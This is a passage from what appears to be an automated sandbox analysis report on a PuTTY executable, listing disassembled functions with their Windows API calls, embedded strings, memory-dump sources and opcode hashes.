                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ByteCharMultiStringTypeWide$ErrorLast
                            • String ID:
                            • API String ID: 3581945363-0
                            • Opcode ID: ef52f63316f1461ec748eef3cb2810c7feac3e3a1fe46bbc2efeab00f2312e14
                            • Instruction ID: aea319fab38a72a8bbfe8bbf9b6c23d4f7c2be548620139dfb7d5622555c3862
                            • Opcode Fuzzy Hash: ef52f63316f1461ec748eef3cb2810c7feac3e3a1fe46bbc2efeab00f2312e14
                            • Instruction Fuzzy Hash: B241F035800214ABCF228FA4DC85AAF3B65FF08766F14421AFC14A7352D738DD94CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043F469 Relevance: 9.1, APIs: 6, Instructions: 116COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ed0aaa4dc42c42cd756b28ca5a5434b3a5980bb8bb633aa9a38db8f08b1c714
                            • Instruction ID: cd8a7987a2ce3d699d2cf41ea139f739c00349b386ce6fff499b32fc831bd6bc
                            • Opcode Fuzzy Hash: 6ed0aaa4dc42c42cd756b28ca5a5434b3a5980bb8bb633aa9a38db8f08b1c714
                            • Instruction Fuzzy Hash: A431E532D10114BADB388F58DC44ABF3BA9EB9D311F112137F80AD22A1D738DD899698
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B78D Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                            Download Yara Rule
                            APIs
                            • CreateFontA.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000000), ref: 0043B7E2
                            • GetDC.USER32(00000000), ref: 0043B7EC
                            • SelectObject.GDI32(00000000,00000000), ref: 0043B7FC
                            • GetTextMetricsA.GDI32(00000000,?), ref: 0043B80B
                            • ReleaseDC.USER32(00000000,00000000), ref: 0043B826
                            • DeleteObject.GDI32(00000000), ref: 0043B834
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Object$CreateDeleteFontMetricsReleaseSelectText
                            • String ID:
                            • API String ID: 4134816134-0
                            • Opcode ID: 45c064472e089bf6f3bd8f99de5a685704ebda11ee8b412d332a5a12ca8bd70e
                            • Instruction ID: 6c22b76d9b17a7e5f011e95705cf5180a69971eff25b477cfb2768bc3a6f2ccc
                            • Opcode Fuzzy Hash: 45c064472e089bf6f3bd8f99de5a685704ebda11ee8b412d332a5a12ca8bd70e
                            • Instruction Fuzzy Hash: 1F21F335601214AFC7256BB49C89BAF7A6DEF49B46F14107AF30697281DB78890187E8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044BEB2 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 287COMMON
                            Download Yara Rule
                            Strings
                            • ..\x11fwd.c, xrefs: 0044C0EF
                            • %s X11 proxy: %s, xrefs: 0044C014
                            • pr->disp->localauthdatalen <= lenof(realauthdata), xrefs: 0044C0F4
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s X11 proxy: %s$..\x11fwd.c$pr->disp->localauthdatalen <= lenof(realauthdata)
                            • API String ID: 0-912635719
                            • Opcode ID: b82c8b1f87981e5209e923e9237ccd891a91baf3a030cfbfaf4e1fa57d82442c
                            • Instruction ID: aa9b856a89396d4e97b9df0699b6f51853c7c331adcbfbfd32c8426ed6ceeb05
                            • Opcode Fuzzy Hash: b82c8b1f87981e5209e923e9237ccd891a91baf3a030cfbfaf4e1fa57d82442c
                            • Instruction Fuzzy Hash: 7BB1C070500745EFD721DF65C881AA7BBF4EF08304B18892EE99A87752D738E905CF99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044A613 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 193COMMON
                            Download Yara Rule
                            APIs
                            • GetCPInfo.KERNEL32(0000FDE9,?,?,00000000), ref: 0044A6EA
                            • GetCPInfo.KERNEL32(?,?,?,00000000), ref: 0044A7BF
                            • GetACP.KERNEL32(?,00000000), ref: 0044A807
                            • GetOEMCP.KERNEL32(?,00000000), ref: 0044A814
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Info
                            • String ID: :
                            • API String ID: 1807457897-336475711
                            • Opcode ID: de446394af216d24f9adea2586820ecf640c9afad83abd2b02bb643387feb8c0
                            • Instruction ID: f119aaab1a313e3a31439d9eefd1e2c6567b14e37ebd0cfae5b66938f821c3bb
                            • Opcode Fuzzy Hash: de446394af216d24f9adea2586820ecf640c9afad83abd2b02bb643387feb8c0
                            • Instruction Fuzzy Hash: A45137715483925FFB305A6598C423B77E8AB14329F28053BF9E0862C2D76DCCA1C65B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0042F207 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 170COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strrchr
                            • String ID: (IPv4)$ (IPv6)$Looking up host "%s"%s$gvE
                            • API String ID: 3213747228-4032953357
                            • Opcode ID: df49cdc6cb45aa4904792bf7190c50cf5f2ae019256db9629bfd9e9e027abac2
                            • Instruction ID: 1c678c0df6eb705945bca5a9004ff5423bf29443683ac31a5fe9b31f7c89d6e4
                            • Opcode Fuzzy Hash: df49cdc6cb45aa4904792bf7190c50cf5f2ae019256db9629bfd9e9e027abac2
                            • Instruction Fuzzy Hash: 21517CB1600700AFCB319F26D88195ABBF5FF08344B90883FF98596361D77AE855CB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040762C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            • Proxy error: SOCKS proxy refused CHAP authentication, xrefs: 0040782B
                            • Proxy error: Server chose CHAP of other than HMAC-MD5 but we didn't offer it!, xrefs: 0040772D
                            • Proxy error: SOCKS proxy won't negotiate CHAP with us, xrefs: 0040781D
                            • Proxy error: SOCKS proxy wants a different CHAP version, xrefs: 00407810
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: Proxy error: SOCKS proxy refused CHAP authentication$Proxy error: SOCKS proxy wants a different CHAP version$Proxy error: SOCKS proxy won't negotiate CHAP with us$Proxy error: Server chose CHAP of other than HMAC-MD5 but we didn't offer it!
                            • API String ID: 4218353326-4119185519
                            • Opcode ID: 1bae4655470863089d2bbbf9340d05ef89dceb84f9c13dc8161ef4d7cc6e5e06
                            • Instruction ID: 395f0cc708b69254f2840674b855e815a2a98cf2161379e2e97e3ceb85659c18
                            • Opcode Fuzzy Hash: 1bae4655470863089d2bbbf9340d05ef89dceb84f9c13dc8161ef4d7cc6e5e06
                            • Instruction Fuzzy Hash: F7512870D04B04AED7219B248C81BBB76F4AB04758F10487FE696B21C2D778B941CB6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041E5AA Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 137COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0040B625: _strlen.LIBCMT ref: 0040B632
                              • Part of subcall function 0040B625: _strcat.LIBCMT ref: 0040B644
                            • _strrchr.LIBCMT ref: 0041E5E3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcat_strlen_strrchr
                            • String ID: (IPv4)$ (IPv6)$Looking up host "%s"%s$gvE
                            • API String ID: 3875031943-4032953357
                            • Opcode ID: 7421521c3b7a6d3280c86c23bcdbfd8c8d57095114ba729c07e67121d2c3cb44
                            • Instruction ID: 3e16c193b552c3beff44ae1440ddb5d1b1373f7a08cd02c1dd35ba95975b10e8
                            • Opcode Fuzzy Hash: 7421521c3b7a6d3280c86c23bcdbfd8c8d57095114ba729c07e67121d2c3cb44
                            • Instruction Fuzzy Hash: 6341C174504301AFEB216F72CD45BEA7BE8EF14308F10042FF9459A292EBBA5990CB5C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044717B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strcat_strlengetaddrinfoinet_addr
                            • String ID: Network is down
                            • API String ID: 1492357749-2877858764
                            • Opcode ID: 8d4abe4bcc3e48f6a0e83397993a706f0b94d106ef2c904e7c51b573fe2cfd51
                            • Instruction ID: b7fa0ed299153501d8b096d43b0cb8fde334e4a9cb6701a14005c4008b19b7be
                            • Opcode Fuzzy Hash: 8d4abe4bcc3e48f6a0e83397993a706f0b94d106ef2c904e7c51b573fe2cfd51
                            • Instruction Fuzzy Hash: 7D414B72C04254DFDF118FA4CCC5ADABBB4FF0A304F14089AE8549B102E37866A5CBA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040DC54 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strrchr
                            • String ID: (IPv4)$ (IPv6)$Looking up host "%s"%s$gvE
                            • API String ID: 3213747228-4032953357
                            • Opcode ID: 93acf89b5bf2ab8b92cf42038301cf40608bd4bca39bc0bfb4fdded447a1d311
                            • Instruction ID: 1ce736e6af8d1388e2f5cfb1169842c2fd5ecaa2103f7b2c911085432fde4018
                            • Opcode Fuzzy Hash: 93acf89b5bf2ab8b92cf42038301cf40608bd4bca39bc0bfb4fdded447a1d311
                            • Instruction Fuzzy Hash: F131A171900305AFEB21AF758C41B9B3BA9EF08308F10443FF944A62D2E77AD811CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040DEAE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strspn
                            • String ID: 0123456789
                            • API String ID: 3953159543-2793719750
                            • Opcode ID: c9b7915d83230f1ec4cf3426f06b73027568f5724ed1ff2f302d5f18ee519b29
                            • Instruction ID: 832fb0fe27b3c345734c07b06e37987222d2acb1b94b11ce50eb985f2f1119e2
                            • Opcode Fuzzy Hash: c9b7915d83230f1ec4cf3426f06b73027568f5724ed1ff2f302d5f18ee519b29
                            • Instruction Fuzzy Hash: F9311975900704BFDB11DFA0CD89E5ABBB9EF4C704F008898F69A9B291C7B6AD41CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00447736 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: ..\windows\winnet.c$FALSE$addr->addresses && step.curraddr < addr->naddresses$family != AF_UNSPEC
                            • API String ID: 0-1926846120
                            • Opcode ID: 19fce80ba19900669a5412d8cd7ada76b3860c39718be1602e1d22e68ce5cd7b
                            • Instruction ID: e73a41beae0cbfa9de5e91e3a7e8736fbb216f3cf3605b4bed91a20e2dda818c
                            • Opcode Fuzzy Hash: 19fce80ba19900669a5412d8cd7ada76b3860c39718be1602e1d22e68ce5cd7b
                            • Instruction Fuzzy Hash: D4110471A88301BBFB305A05DCC2B5773A4AB00718F64452BFA0456781E7BDBD86869F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043B2BA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendDlgItemMessageA.USER32(00000003,?,00000190,00000000,00000000), ref: 0043B329
                            • SendDlgItemMessageA.USER32(00000003,?,?,00000000,00000000), ref: 0043B350
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend
                            • String ID: ..\windows\winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX$c->ctrl->listbox.height != 0
                            • API String ID: 3015471070-1818056993
                            • Opcode ID: 13c7b18d93c76a8f5aeddb88fe2087e41142d81066dbff5201adc5e52565f915
                            • Instruction ID: 5e766020d705b1ea907fec4bf615e8864eaeb2b838a7f040b9587eabe52cf42c
                            • Opcode Fuzzy Hash: 13c7b18d93c76a8f5aeddb88fe2087e41142d81066dbff5201adc5e52565f915
                            • Instruction Fuzzy Hash: AF1129B2240514EFD6109A28DC81E277758EB0A725F251367F664D72D1DB35EC108AAA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043D6D1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62stringCOMMON
                            Download Yara Rule
                            APIs
                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0043D70F
                            • GetSystemMetrics.USER32(00000000), ref: 0043D727
                            • GetSystemMetrics.USER32(00000001), ref: 0043D72E
                            • lstrcpynA.KERNEL32(-00000026,DISPLAY,00000020,00000000), ref: 0043D754
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: System$Metrics$InfoParameterslstrcpyn
                            • String ID: DISPLAY
                            • API String ID: 2307409384-865373369
                            • Opcode ID: 6a611bec164de42e3f219edb2ff34b5a2d0c86826c1b2e8d37fc6b6adffe0e9f
                            • Instruction ID: c690c3e9753278bd5f641e3d7771ba2765212994390f623c2822e1d86417151b
                            • Opcode Fuzzy Hash: 6a611bec164de42e3f219edb2ff34b5a2d0c86826c1b2e8d37fc6b6adffe0e9f
                            • Instruction Fuzzy Hash: 0211A071A00324ABCF119F64AD8465BBBAAFF09751F009063FD09AA106D3B5D941CFE9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043DA57 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON
                            Download Yara Rule
                            APIs
                            • LoadCursorA.USER32(00000000,-00007F01), ref: 0043DA12
                            • SetClassLongA.USER32(000000F4,00000000), ref: 0043DA23
                            • SetCursor.USER32(00000000,?,004337AE,E8000010,00000000,00000A26,0000006C,00000A26,0000006B,00000A26,0000004A,00000A26,00000049,00000A26,0000005D,00000A26), ref: 0043DA2A
                            • ShowCursor.USER32(00000000,004337AE,E8000010,00000000,00000A26,0000006C,00000A26,0000006B,00000A26,0000004A,00000A26,00000049,00000A26,0000005D,00000A26,0000005C), ref: 0043DA3A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Cursor$ClassLoadLongShow
                            • String ID: ..\windows\window.c
                            • API String ID: 1160125251-1664963243
                            • Opcode ID: eaacf526c0ea13ef975f4ddc7a981a34db081c4e73dc6338c722537515588ef4
                            • Instruction ID: 5652b3f23fae6b5c87a3fc23e6de025aa0941c12f286dd642dba84bccaeb281a
                            • Opcode Fuzzy Hash: eaacf526c0ea13ef975f4ddc7a981a34db081c4e73dc6338c722537515588ef4
                            • Instruction Fuzzy Hash: 6B114C70A0C252AFD7105B64FC09B763764EB08752F24513BF909D12E0E72C8881D79D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00402263 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • _wctomb_s.LIBCMT ref: 004022D1
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat$FileModuleName_strncpy_wctomb_s
                            • String ID: ..\conf.c$gvE$subkeytypes[primary] == TYPE_STR$valuetypes[primary] == TYPE_STR
                            • API String ID: 3884260313-583392501
                            • Opcode ID: c5f62212fa4e37dfea34a2d423d40ac07018d333af9f9d7800c0c044cafd27a9
                            • Instruction ID: 8feadaaac9552ce52bb76c90c51ca0d6fc3b7b93bb0e59e412f14a764c8fef6e
                            • Opcode Fuzzy Hash: c5f62212fa4e37dfea34a2d423d40ac07018d333af9f9d7800c0c044cafd27a9
                            • Instruction Fuzzy Hash: 5C01C4B0600204BFDB119F89DD0AE9A77A8EB45700F1440BBFD04AB3D1E2B9ED04C69A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043DA49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                            Download Yara Rule
                            APIs
                            • LoadCursorA.USER32(00000000,-00007F01), ref: 0043DA12
                            • SetClassLongA.USER32(000000F4,00000000), ref: 0043DA23
                            • SetCursor.USER32(00000000,?,004337AE,E8000010,00000000,00000A26,0000006C,00000A26,0000006B,00000A26,0000004A,00000A26,00000049,00000A26,0000005D,00000A26), ref: 0043DA2A
                            • ShowCursor.USER32(00000000,004337AE,E8000010,00000000,00000A26,0000006C,00000A26,0000006B,00000A26,0000004A,00000A26,00000049,00000A26,0000005D,00000A26,0000005C), ref: 0043DA3A
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
